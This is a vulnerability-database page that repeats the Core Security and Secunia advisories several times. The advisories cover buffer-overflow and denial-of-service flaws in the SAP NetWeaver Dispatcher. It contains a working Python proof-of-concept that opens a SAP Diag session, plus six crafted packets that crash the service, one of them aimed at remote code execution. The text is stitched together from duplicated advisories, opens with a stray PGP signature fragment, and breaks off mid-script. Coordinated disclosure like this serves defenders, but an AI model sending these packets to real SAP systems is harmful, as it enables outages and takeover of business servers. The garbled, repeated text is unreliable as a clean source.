Qm7SmIZL9sjl5gQkTxoAvOGxJ8uRdYPlJ1IpyU/MbK0GqO53KmFSeKkwCnvLKMaW pc6tiFaQ4zV4LEAwBAFEuqCsMyPEJqKDhYXl2cHQmWfAlrLCyCKfzGLy2mY2UnkE DQC2+ys70DChFv2GzyXlibBXAGMKDygJ5dVKynsi1ceZLYWbUJoGwlUtXPylBpnO QyGWXmEloPbhK6HJbKMNacuDdVcb26pvIeFiivkTSxPVlZ3ns2tAwEyvHrzA9O4n 7rQ6jvfDbguOZmM5sPFvVKBw2GVDBNU+G3T8ouIXhk6Pjhr4in8VFCb8MIMLb8hm 7YYn2z1TzKTNmUuYbwe6ukQvf57cPuW0bAvslbl6PgrzqorlNPU4rDoSvPrJx/RO BOYkcxfirevHDGibfkeqXPjL3h+bVrb1USZpAv+ZOAy0M89SHFcvMtpAhxnoGiV5 w4EyKB+9Yi/CSAk2Ne3Y5kHH7/v3pWV68aJwhVirya7ex3vnJ+M+lRLKSm2BUjL3 +9fykrJBDujFDXoCmK5CN5Wx36DSVZ4VO1h635crotudtcvd+LQ2VHma/Chav5wK q5SSllf4KEownpx6o/qTxpg5tcC4lvgTcsDHlYcNq2s8KTTjmOden8ar4h7M7QD2 xyBfrQfG/dsif6jGHaot =8joH -----END PGP SIGNATURE-----

SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash. SAP NetWeaver There is an unspecified vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Netweaver Dispatcher Multiple Vulnerabilities 1. *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application

The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application

The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = 